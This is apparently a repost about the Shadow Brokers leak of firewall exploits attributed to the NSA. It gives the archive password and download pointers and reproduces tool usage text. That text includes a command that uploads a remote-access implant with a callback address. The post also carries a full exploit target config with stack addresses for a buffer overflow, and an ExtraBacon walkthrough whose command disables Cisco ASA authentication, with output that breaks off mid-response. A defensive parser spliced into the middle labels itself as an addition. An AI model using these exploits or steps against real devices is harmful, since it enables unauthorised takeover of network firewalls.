NSA Equation Group Data Leak

Anonymous  2831 days ago

A hacker claims to have broken into the Equation Group and is auctioning off the stolen exploits.

/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group


Archive download (extraction password: theequationgroup)

MEGA DOWNLOAD EquationGroup Files

How to extract:

gpg --decrypt --output eqgrp-free-file.tar.xz eqgrp-free-file.tar.xz.gpg

Extracting eqgrp-free-file.tar.xz produces the directory tree.

Someone has already shared the extracted files on GitHub.


Cisco and Fortinet confirm: the vulnerabilities exposed by the NSA hackers are real

http://mobile.163.com/16/0818/06/BUNV1ERT00118023.html

Cisco patches the vulnerabilities and publishes a technical analysis

http://www.2cto.com/News/201608/539647.html

Inside story: a deep dive into the NSA intrusion incident

http://bobao.360.cn/news/detail/3467.html

The 'Shadow Brokers' group asks 1 million bitcoin (USD 568 million) for US military cyber-attack tools (with video)

http://bobao.360.cn/learning/detail/2966.html

19 August: introduction and technical analysis of the files leaked by Shadow Brokers (part 1)

http://bobao.360.cn/learning/detail/2970.html

BenignCertain: a hacking tool that can remotely extract Cisco VPN keys

http://bobao.360.cn/learning/detail/2974.html


Other reference sources:

1. Cisco security advisory, CVE-2016-6366:

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6366

2. Cisco security advisory, CVE-2016-6367:

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-cli

3. Cisco ASA product integrity assurance overview:

http://www.cisco.com/c/en/us/about/security-center/intelligence/asa-integrity-assurance.html

4. Cisco ASA firewall SNMP configuration guide:

http://www.cisco.com/c/en/us/td/docs/security/asa/asa96/configuration/general/asa-96-general-config/monitor-snmp.html

5. Cisco's event response report on the "The Shadow Brokers" incident:

http://tools.cisco.com/security/center/viewErp.x?alertId=ERP-56516



Two archives were leaked; only the free-file archive can be opened, the other has no password yet (100 bitcoin):

$ ls -lah *.gpg
-rw-rw-r--@ 1 noname  staff   128M  7 25 10:49 eqgrp-auction-file.tar.xz.gpg
-rw-rw-r--@ 1 noname  staff   182M  7 25 10:50 eqgrp-free-file.tar.xz.gpg

The free-file archive mainly contains scanners, exploitation frameworks and similar tooling aimed at firewalls:

  • BLATSTING -- brute forcing
  • EXPLOITS -- exploit code
  • OPS -- attack operation control toolkit
  • SCRIPTS -- script resource library
  • TOOLS -- helper tools (encoding conversion, IP format conversion, encryption/decryption, etc.)

By analysing the file names of the corresponding attack payloads we can roughly guess which firewall versions are affected; for example, from the listing below a Google search shows that Cisco's ASA5505 firewall is affected.

# find /Firewall/BANANAGLEE/BG3000/
.//Install/SCP/asa5505_clean60000.bin
.//Install/SCP/asa5505_clean70000.bin
.//Install/SCP/asa5505_cleanE18BF.bin
.//Install/SCP/asa5505_cleanEC480.bin
.//Install/SCP/asa5505_patch60000.bin
.//Install/SCP/asa5505_patchE18BF.bin
.//Install/SCP/asa5505_patchEC480.bin
.//Install/SCP/asaGen_clean10000_biosVer114or115.bin
.//Install/SCP/asaGen_clean20000_biosVer100or112.bin

Juniper NetScreen-ISG 2000 firewall

# ls -lah ./Firewall/BARGLEE/BARGLEE3100/Install/LP
drwxr-xr-x  23 noname  staff   782B  8 16 12:35 .
drwxr-xr-x   3 noname  staff   102B  4 10  2010 ..
-rwxr-xr-x   1 noname  staff   1.8M  6 11  2013 BARPUNCH-3110
-rwxr-xr-x   1 noname  staff   2.4M  6 11  2013 BICE-3110
drwxr-xr-x   6 noname  staff   204B  4 10  2010 Modules
-rwxr-xr-x   1 noname  staff   1.7M  6 11  2013 SecondDateCommon-miniprog-3110
-rwxr-xr-x   1 noname  staff   7.8K  6 11  2013 bg_redirect.pl-3110
-rwxr-xr-x   1 noname  staff   431K  6 11  2013 bg_redirector-3110
-rwxr-xr-x   1 noname  staff   1.9M  6 11  2013 cfMiniProg-3110
-rwxr-xr-x   1 noname  staff   1.1M  6 11  2013 isg1000-moduledata-3113.tgz
-rwxr-xr-x   1 noname  staff   996K  6 11  2013 isg2000-moduledata-3113.tgz
-rwxr-xr-x   1 noname  staff   385K  6 11  2013 keygen-3110
-rwxr-xr-x   1 noname  staff   285K 10 18  2013 maclist
-rwxr-xr-x   1 noname  staff   1.7M  6 11  2013 nsLogMiniProg-3110
-rwxr-xr-x   1 noname  staff   413K  6 11  2013 pd_create_ruleset-3110
-rwxr-xr-x   1 noname  staff   1.9M  6 11  2013 pd_miniprog-3110
-rwxr-xr-x   1 noname  staff   6.2K  6 11  2013 pd_start_pat.pl-3110
-rwxr-xr-x   1 noname  staff   1.8M  6 11  2013 profilerIpv4-3100
-rwxr-xr-x   1 noname  staff    29M  6 11  2013 ssg300-moduledata-3115.tgz
-rwxr-xr-x   1 noname  staff    29M  6 11  2013 ssg500-moduledata-3115.tgz
-rwxr-xr-x   1 noname  staff    13K  6 11  2013 start_redirector.pl-3110
-rwxr-xr-x   1 noname  staff    42B  6 11  2013 stop_redirector.sh-3110
-rwxr-xr-x   1 noname  staff   1.9M  6 11  2013 tunWiz-3110

The same directory holds the pl and sh exploit code for this firewall; the options carry an attack_ip field, draw your own conclusions.

# perl pd_start_pat.pl-3110
Usage: pd_start_pat.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file>
       [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number>
       --attack_ip <attack_ip> --intermediate_ip <intermediate_ip>
       --attack_int <interface> --target_int <interface> --port_offset <port offset>
       --trans_timeout <timeout> --pat_timeout <seconds> --attack_port <port>
       [--logdir <logdir>] [--help]

# perl start_redirector.pl-3110 // tunnel attack tool
Usage: start_redirector.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file>
       [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number> --local_ip <ip>
       --clr_tunnel_ip <ip> --enc_tunnel_ip <ip> --orig_src_ip <ip> --enc_redir_ip <ip> --clr_redir_ip <ip>
       --target_ip <ip> --enc_tunnel_pt <port> --enc_redir_pt <port>
       --enc_iface <interface number> --clr_iface <interface number>
       --enc_key <encryption key file> [--proto <protocol>] [--redir_to_target_dest_pt <port>]
       [--redir_to_target_src_pt <port>] [--target_to_redir_dest_pt <port>]
       [--target_to_redir_src_pt <port>] [--tunnel_to_attacker_dest_pt <port>]
       [--tunnel_to_attacker_src_pt <port>] [--restart] --timeout <seconds> [--logdir <logdir>]
       [--help]

Judging from the overall file structure, the toolkit was built in 2010.

# ls -la
-rw-r--r--@  1 noname  staff   6.0K  8 16 12:35 .DS_Store
drwxr-xr-x   8 noname  staff   272B  4 10  2010 BANANAGLEE
drwxr-xr-x   3 noname  staff   102B  4 10  2010 BARGLEE
drwxr-xr-x   9 noname  staff   306B  4 10  2010 BLATSTING
drwxr-xr-x   4 noname  staff   136B  4 10  2010 BUZZDIRECTION
drwxr-xr-x  10 noname  staff   340B  4 10  2010 EXPLOITS
drwxr-xr-x   8 noname  staff   272B  8 16 12:35 OPS
drwxr-xr-x  35 noname  staff   1.2K  8 16 12:35 SCRIPTS
drwxr-xr-x  18 noname  staff   612B  8 16 12:36 TOOLS
drwxr-xr-x   4 noname  staff   136B  8 16 12:35 TURBO
-rw-r--r--   1 noname  staff    19M  4 10  2010 padding

The attack framework consists mainly of scripts: Python, Perl and shell scripts.

# find ./ -name *.py | wc -l
     235
# find ./ -name *.pl | wc -l
       7
# find ./ -name *.sh | wc -l
      15

The BombShell tool

Firewall/EXPLOITS/ELBO/ $ python eligiblebombshell_1.2.0.1.py
Usage: eligiblebombshell_1.2.0.1.py [options]

See -h for specific options (some of which are required).

Examples:

Scan to find (unknown versions) or confirm (known versions) vulnerability:
  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --scan -v

Once a valid entry is in ELBO.config, upload nopen:
  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --nopen -n noserver -c 5.6.7.8:12345 -v

Delete uploaded files from the previous step:
  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --cleanup -v

eligiblebombshell_1.2.0.1.py: error: -t/--target-ip is required!

The attack configuration file that goes with eligiblebombshell_1.2.0.1

# ELBO.config
#
# format for known versions:
#   ETAG = <ETag> : <action> : 0x<stack addr> : <version>
# format for unknown versions:
#   ETAG = <ETag> : <action> : 0x<stack addr>
#
# The device returns wacky, invalid ETags sometimes. This file just records
# the "normal" looking parts (without "" and other characters). E.g.:
#
#    device ETag       |   this file
# ---------------------|------------------
# "e8-569-46b6b873"    | e8-569-46b6b873
# "3991-583-4727f5a3"  | 3991-583-4727f5a3
# W/"55b-583-47958bb3" | 55b-583-47958bb3
# W/"55f-583-47e0a4a8" | 55f-583-47e0a4a8
# W/"600-5e7-494fd7a7" | 600-5e7-494fd7a7
# W/"69a-5e7-49c3697f" | 69a-5e7-49c3697f

# Path to RAT
NOSERVER = /current/up/morerats/staticrats/noserver-3.3.0.1-linux-i386-static 

#################################
# ETags from actual hardware
#################################

# tested
ETAG =   e6-569-46b6b873 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.2.100.010.1_pbc_17_iv_3
ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.001.050.1
ETAG =  596-583-47958bb3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.021.1
ETAG =  59a-583-47e0a4a8 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.030.1
ETAG =  641-5e7-494fd7a7 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.057.1
ETAG =  6e4-5e7-49c3697f : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.061.1

# added Dec. 2009 - WOBBLYLLAMA
ETAG =  55b-583-487b260e : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.8_003

# added Mar. 2010 - FLOCKFORWARD
ETAG =  6c6-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.066.1

# added Mar. 2010 - HIDDENTEMPLE
ETAG = 1065-569-44aa3cac : /cgi/maincgi.cgi?Url=Index : 0xbfffec70 : tos_3.2.8840.1

# added May. 2010 - CONTAINMENTGRID
ETAG = 83c-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : tos_3.3.005.066.1

#BLATSTING SUPPORT FOR ALL ABOVE

# added Sep. 2010 - GOTHAMKNIGHT
ETAG = 386f-569-46e895e3 : /cgi/maincgi.cgi?Url=Index : 0xbfffec40 : v3.2.100.010.8_pbc_27


###################################################################
# BELOW IS FOR DEVELOPERS ONLY
###################################################################
# Etags and address from real hardware
#ETAG =   e6-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.2.100.010.1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.3.001.050.1
#ETAG =  596-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1
#ETAG =  59a-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1
#ETAG =  641-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1
#ETAG =  6e4-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1
#ETAG =  69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb40 : v3.3.005.061.1
# ETags and addresses from milliways
#ETAG =   e8-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.2.100.010_1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.3.001.050.1
#ETAG =  55b-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1
#ETAG =  55f-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1
#ETAG =  600-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1
#ETAG =  69a-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1
#ETAG =   e8-569-46b6b873 : /cgi/maincgi.cgi?Url=Index : 0xbfffec50 : v3.2.100.010_1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb50 : v3.3.001.050.1
#ETAG =  55b-583-47958bb3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.021.1
#ETAG =  55f-583-47e0a4a8 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.030.1
#ETAG =  600-5e7-494fd7a7 : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.057.1
#ETAG =  69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.061.1
###################################################################

# SCANPLAN format (dates are INCLUSIVE and written as hex values just like the third etag field):
#   SCANPLAN = <action> : <min etag date> : <max etag date> : <comma-delimited list of addresses>

# Notes:
# - The full list of addresses must be all on one line.
# - SCANPLAN addresses CANNOT contain a null byte (00) - doing so will break the exploit's
#   buffer overflow.
# - The --etag argument will be matched against the min/max dates of these scanplans. If more than
#   one plan matches, they will be tried in the order they're listed in this file. If none match,
#   the user will get an error to that effect.

# libc attacks - scan plan is simple (try them both)
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x00000000 : 0x494fd7a6 : libc.0,libc.1
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x494fd7a7 : 0xffffffff : libc.1,libc.0

# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x494fd7a7 : 0xffffffff : 0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x487b260f : 0x494fd7a6 : 0x7fffcf80,0xbfffeb80,0x7fffd280,0xbfffee80,0x7fffcc80,0xbfffe880,0x7fffd580,0xbffff180,0x7fffc980,0xbfffe580,0x7fffd880,0xbffff480,0x7fffc680,0xbfffe280,0x7fffdb80,0xbffff780,0x7fffc380,0xbfffdf80,0x7fffde80,0xbffffa80,0x7fffe180,0xbfffdc80,0x7fffe480,0xbfffd980,0x7fffe780,0xbfffd680,0x7fffea80,0xbfffd380,0x7fffed80,0xbfffd080,0x7ffff080,0xbfffcd80,0x7ffff380,0xbfffca80,0x7ffff680,0xbfffc780,0x7ffff980,0xbfffc480,0x7ffffc80,0xbfffc180

# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x494fd7a7 : 0xffffffff : 0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x487b260f : 0x494fd7a6 : 0xbfffeb80,0x7fffeb80,0xbfffee80,0x7fffee80,0xbfffe880,0x7fffe880,0xbffff180,0x7ffff180,0xbfffe580,0x7fffe580,0xbffff480,0x7ffff480,0xbfffe280,0x7fffe280,0xbffff780,0x7ffff780,0xbfffdf80,0x7fffdf80,0xbffffa80,0x7ffffa80,0xbfffdc80,0x7fffdc80,0xbfffd980,0x7fffd980,0xbfffd680,0x7fffd680,0xbfffd380,0x7fffd380,0xbfffd080,0x7fffd080,0xbfffcd80,0x7fffcd80,0xbfffca80,0x7fffca80,0xbfffc780,0x7fffc780,0xbfffc480,0x7fffc480,0xbfffc180,0x7fffc180

```

EGBL = EGREGIOUS BLUNDER (Fortigate Firewall + HTTPD exploit (apparently 2006 CVE))
ELBA = ELIGIBLE BACHELOR
ELBO = ELIGIBLE BOMBSHELL (Chinese TOPSEC firewall versions 3.3.005.057.1 to 3.3.010.024.1)
ELCA = ELIGIBLE CANDIDATE
ELCO = ELIGIBLE CONTESTANT
EPBA = EPIC BANANA
ESPL = ESCALATE PLOWMAN
EXBA = EXTRA BACON (Cisco Adaptive Security Appliance v8.0 to v8.4)

BANANAGLEE = Juniper Netscreen Devices
BARGLEE
BLATSTING
BUZZDIRECTION
SP = ScreamPlow 2.3 (BG3001 BG3000 BG3100)
BD = BannanaDaiquiri 3.0.5.1 (BG3001 BG3000 BG3100)

```
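The ELBO.config format quoted above (ETAG entries, plus the SCANPLAN date-range rule described in the file's own notes), as an added example that is not part of the original post or of the leaked tool: a small parser a defender can use to check whether a TOPSEC device's ETag header value appears in the leaked target list, and which date range it would otherwise fall under. The config excerpt is constructed from the entries quoted above; `parse_config`, `lookup` and the other names are my own.

```python
import re

# Constructed excerpt: a few ETAG and SCANPLAN lines copied from the ELBO.config quoted above.
ELBO_CONFIG = """\
# tested
ETAG =   e6-569-46b6b873 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.2.100.010.1_pbc_17_iv_3
ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.001.050.1
# added Dec. 2009 - WOBBLYLLAMA
ETAG =  55b-583-487b260e : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.8_003
#ETAG =   e6-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.2.100.010.1_pbc_17_iv_3
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x00000000 : 0x494fd7a6 : libc.0,libc.1
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x494fd7a7 : 0xffffffff : libc.1,libc.0
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x487b260f : 0x494fd7a6 : 0x7fffcf80,0xbfffeb80
"""

ENTRY_RE = re.compile(r"^\s*(ETAG|SCANPLAN)\s*=\s*(.+?)\s*$")


def normalize_etag(raw):
    """Reduce a raw ETag header to the form the file records: no W/ prefix, no quotes."""
    s = raw.strip()
    s = s[2:] if s.startswith("W/") else s
    return s.strip('"')


def etag_date(etag):
    """The third dash-separated ETag field is a hex date; SCANPLAN ranges compare against it."""
    return int(etag.split("-")[2], 16)


def parse_config(text):
    """Return ({etag: [(action, version)]}, [(action, min_date, max_date, addresses)]).
    Lines starting with '#' are comments, which is how the developer-only entries are disabled."""
    known, plans = {}, []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if line.lstrip().startswith("#") or not m:
            continue
        fields = [f.strip() for f in m.group(2).split(":")]
        if m.group(1) == "ETAG":
            version = fields[3] if len(fields) > 3 else None   # 3-field form = unknown version
            known.setdefault(fields[0], []).append((fields[1], version))
        else:
            action, lo, hi, addrs = fields
            plans.append((action, int(lo, 16), int(hi, 16), addrs.split(",")))
    return known, plans


def lookup(raw_etag, text=ELBO_CONFIG):
    """Known versions for this ETag, plus the scan plans whose date range covers its date."""
    known, plans = parse_config(text)
    etag = normalize_etag(raw_etag)
    date = etag_date(etag)
    versions = sorted({v for _, v in known.get(etag, []) if v})
    matching = [p for p in plans if p[1] <= date <= p[2]]
    return {"etag": etag, "versions": versions, "plans": matching}
```

An empty `versions` list with one or more matching plans means the ETag is not in the known list but its date still falls inside a range the config would try.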


Addendum:

A typical exploitation walkthrough: https://xorcatt.wordpress.com/2016/08/16/equationgroup-tool-leak-extrabacon-demo/


Hi there,

You may have heard that recently (15/08/2016) a group known as Shadow Brokers released what are said to be a bunch of exploits and tools written and used by the NSA.

Two tar files were released, one with the password of “theequationgroup”, named “eqgrp-free-file.tar.xz.gpg”. The other is named “eqgrp-auction-file.tar.xz.gpg”, and according to the post where Shadow Brokers broke the news (now removed, but cached here), they will release the key for this file, which supposedly contains juicier content, to the person who bids the most in their bitcoin auction, which ends at a time of Shadow Brokers’ choosing.

The files are currently still available for download from this MEGA link, although I don’t know how long it will stay alive, as it was also hosted on GitHub, who tore it down shortly after it was posted.

The exploits appear to be targeting firewalls, particularly Cisco PIX/ASA, Juniper Netscreen, Fortigate, and more.

Seeing that there is an exploit for the Cisco ASA, I thought I would give it a shot in my CCNA Security ASA lab!

The requirements for the ExtraBacon exploit are that you have SNMP read access to the firewall, as well as access to either telnet or SSH. The ASA must be running 8.x, up to 8.4(4), and is said to have the possibility to crash the firewall if something goes wrong.

Once the exploit is successful, the attacker will be able to SSH or telnet to the firewall (depending on what protocol is set up on the FW) without needing to enter credentials. If an enable password is set, this will still need to be a barrier for managing the firewall, as the exploit does not appear to disable it.

The command to execute the authentication disabling payload is:

python extrabacon_1.1.0.1.py exec -t 10.1.1.250 -c pubString --mode pass-disable

Which gives the following output:

xorcat@boxen:~/Downloads/EQGRP-Auction-Files/Firewall/EXPLOITS/EXBA[130] $ python extrabacon_1.1.0.1.py exec -t 10.1.1.250 -c pubString --mode pass-disable
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /Users/xorcat/Downloads/EQGRP-Auction-Files/Firewall/EXPLOITS/EXBA/concernedparent
[+] Executing:  extrabacon_1.1.0.1.py exec -t 10.1.1.250 -c pubString --mode pass-disable
[+] probing target via snmp
[+] Connecting to 10.1.1.250:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['pubString']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid 
            
